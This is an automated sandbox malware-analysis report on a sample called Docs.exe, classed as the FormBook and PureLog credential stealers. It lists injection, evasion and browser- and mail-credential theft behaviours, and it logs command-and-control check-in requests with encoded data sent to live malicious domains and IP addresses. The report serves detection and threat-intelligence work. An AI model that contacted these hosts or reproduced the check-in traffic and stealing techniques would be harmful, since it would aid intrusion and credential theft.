Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Docs.exe

Overview

General Information

Sample name:Docs.exe
Analysis ID:1564721
MD5:db3260038649d2048d4d203b210c42ad
SHA1:5057a1fd64ddcf3ecc104558972db366a062f6ca
SHA256:a0d68da288f42150fd44bda2ead2c51e139e25b518a932e8071818af802107b3
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Docs.exe (PID: 5316 cmdline: "C:\Users\user\Desktop\Docs.exe" MD5: DB3260038649D2048D4D203B210C42AD)
    • Docs.exe (PID: 4332 cmdline: "C:\Users\user\Desktop\Docs.exe" MD5: DB3260038649D2048D4D203B210C42AD)
      • hrhhgLQrQIpiVv.exe (PID: 1856 cmdline: "C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 4148 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • hrhhgLQrQIpiVv.exe (PID: 1268 cmdline: "C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6672 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3289220209.00000000037E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3289268086.0000000003830000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.2064805935.0000000007030000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000003.00000002.2597842701.0000000001910000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.3288549550.0000000000DE0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Docs.exe.3ae24c8.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              3.2.Docs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                3.2.Docs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  0.2.Docs.exe.7030000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.Docs.exe.3ae24c8.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T18:29:39.701273+010020507451Malware Command and Control Activity Detected192.168.2.549735161.97.142.14480TCP
                      2024-11-28T18:30:05.449809+010020507451Malware Command and Control Activity Detected192.168.2.549739107.155.56.3080TCP
                      2024-11-28T18:30:21.433517+010020507451Malware Command and Control Activity Detected192.168.2.54974318.139.62.22680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T18:29:39.701273+010028554651A Network Trojan was detected192.168.2.549735161.97.142.14480TCP
                      2024-11-28T18:30:05.449809+010028554651A Network Trojan was detected192.168.2.549739107.155.56.3080TCP
                      2024-11-28T18:30:21.433517+010028554651A Network Trojan was detected192.168.2.54974318.139.62.22680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-28T18:29:57.349629+010028554641A Network Trojan was detected192.168.2.549736107.155.56.3080TCP
                      2024-11-28T18:30:00.021193+010028554641A Network Trojan was detected192.168.2.549737107.155.56.3080TCP
                      2024-11-28T18:30:02.697212+010028554641A Network Trojan was detected192.168.2.549738107.155.56.3080TCP
                      2024-11-28T18:30:13.333737+010028554641A Network Trojan was detected192.168.2.54974018.139.62.22680TCP
                      2024-11-28T18:30:15.990010+010028554641A Network Trojan was detected192.168.2.54974118.139.62.22680TCP
                      2024-11-28T18:30:18.646422+010028554641A Network Trojan was detected192.168.2.54974218.139.62.22680TCP
                      2024-11-28T18:30:37.089228+010028554641A Network Trojan was detected192.168.2.549744209.74.77.10780TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMbHvD8EqtoJ5XtYi/VJ05VR664cQpqJJXFZbebi2oU1EEMw==&mFTD=mPHXHpAvira URL Cloud: Label: malware
                      Source: http://www.taxiquynhonnew.click/y49d/Avira URL Cloud: Label: malware
                      Source: https://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for submitted file
                      Source: Docs.exeReversingLabs: Detection: 36%
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Docs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3289220209.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3289268086.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2597842701.0000000001910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3288549550.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2597967111.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: Docs.exeJoe Sandbox ML: detected
                      Source: Docs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Docs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: owNk.pdbSHA256k source: tzutil.exe, 00000007.00000002.3290025914.000000000405C000.00000004.10000000.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000000.2666355182.0000000002D9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2885351736.00000000196EC000.00000004.80000000.00040000.00000000.sdmp, Docs.exe
                      Source: Binary string: tzutil.pdbGCTL source: Docs.exe, 00000003.00000002.2596435767.0000000001108000.00000004.00000020.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3288966873.00000000015D8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hrhhgLQrQIpiVv.exe, 00000006.00000002.3287825092.00000000003CE000.00000002.00000001.01000000.0000000C.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3287843447.00000000003CE000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: Docs.exe, 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2599187804.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2596619610.0000000003613000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: Docs.exe, Docs.exe, 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2599187804.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2596619610.0000000003613000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: owNk.pdb source: tzutil.exe, 00000007.00000002.3290025914.000000000405C000.00000004.10000000.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000000.2666355182.0000000002D9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2885351736.00000000196EC000.00000004.80000000.00040000.00000000.sdmp, Docs.exe
                      Source: Binary string: tzutil.pdb source: Docs.exe, 00000003.00000002.2596435767.0000000001108000.00000004.00000020.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3288966873.00000000015D8000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_0321C9D0 FindFirstFileW,FindNextFileW,FindClose,7_2_0321C9D0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then xor eax, eax7_2_03209F80
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then mov ebx, 00000004h7_2_03CD04D0

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49737 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49735 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49735 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49736 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49740 -> 18.139.62.226:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49739 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49739 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49741 -> 18.139.62.226:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 18.139.62.226:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49744 -> 209.74.77.107:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49743 -> 18.139.62.226:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49743 -> 18.139.62.226:80
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.070001325.xyz
                      Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                      Source: Joe Sandbox ViewIP Address: 18.139.62.226 18.139.62.226
                      Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                      Source: Joe Sandbox ViewASN Name: UHGL-AS-APUCloudHKHoldingsGroupLimitedHK UHGL-AS-APUCloudHKHoldingsGroupLimitedHK
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /gebt/?rvEtL=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edh05neJJauEoNaZQG1y+cvjoSHU7S86EKf7lUg55fOkggqQ==&mFTD=mPHXHp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.070001325.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /2gcl/?rvEtL=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmadCojy5vYT1OBl+VDfuWeAsbdd6UgJfU04VHRics3erVRA==&mFTD=mPHXHp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.expancz.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMbHvD8EqtoJ5XtYi/VJ05VR664cQpqJJXFZbebi2oU1EEMw==&mFTD=mPHXHp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.taxiquynhonnew.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global trafficDNS traffic detected: DNS query: www.070001325.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.expancz.top
                      Source: global trafficDNS traffic detected: DNS query: www.taxiquynhonnew.click
                      Source: global trafficDNS traffic detected: DNS query: www.epitomize.shop
                      Source: global trafficDNS traffic detected: DNS query: www.learnwithus.site
                      Source: unknownHTTP traffic detected: POST /2gcl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.expancz.topOrigin: http://www.expancz.topConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 206Cache-Control: max-age=0Referer: http://www.expancz.top/2gcl/User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 72 76 45 74 4c 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 78 33 4b 7a 73 6f 71 45 5a 64 74 68 31 76 42 58 57 71 48 55 58 54 75 39 45 2b 59 50 50 65 45 70 75 41 4a 49 7a 4c 76 73 47 62 62 2b 31 78 7a 78 51 56 63 38 74 4d 56 6b 55 38 62 61 34 49 6b 46 33 4d 44 63 31 74 4a 6f 41 75 7a 5a 36 67 45 4e 54 52 6f 69 65 6d 65 4f 4e 59 2f 70 63 54 67 49 52 66 58 72 69 4a 54 37 32 75 46 30 65 48 42 53 77 76 6d 78 4f 77 71 76 71 70 34 61 54 59 4b 79 6e 6f 4d 69 65 6e 66 42 47 36 4d 65 59 2b 63 50 34 70 6b 4c 53 7a 31 7a 64 77 2f 54 2f 36 64 59 2b 35 35 56 6e 37 54 6f 67 44 72 65 33 4f 51 5a 5a 69 31 74 67 76 55 6f 44 54 30 3d Data Ascii: rvEtL=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLSz1zdw/T/6dY+55Vn7TogDre3OQZZi1tgvUoDT0=
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 17:29:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                      Source: hrhhgLQrQIpiVv.exe, 00000008.00000002.3288549550.0000000000E4D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taxiquynhonnew.click
                      Source: hrhhgLQrQIpiVv.exe, 00000008.00000002.3288549550.0000000000E4D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taxiquynhonnew.click/y49d/
                      Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
                      Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
                      Source: hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dq0ib5xlct7tw.cloudfront.net/
                      Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://l3filejson4dvd.josyliving.com/favicon.ico
                      Source: tzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live
                      Source: tzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: tzutil.exe, 00000007.00000002.3288094917.000000000355B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: tzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: tzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: tzutil.exe, 00000007.00000002.3288094917.000000000355B000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: tzutil.exe, 00000007.00000002.3288094917.000000000352F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: tzutil.exe, 00000007.00000003.2775659259.00000000082B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: tzutil.exe, 00000007.00000002.3290025914.00000000045D6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000007.00000002.3291655096.0000000006810000.00000004.00000800.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289847590.0000000003316000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s.yimg.com/wi/ytc.js
                      Source: tzutil.exe, 00000007.00000002.3291868044.0000000008385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
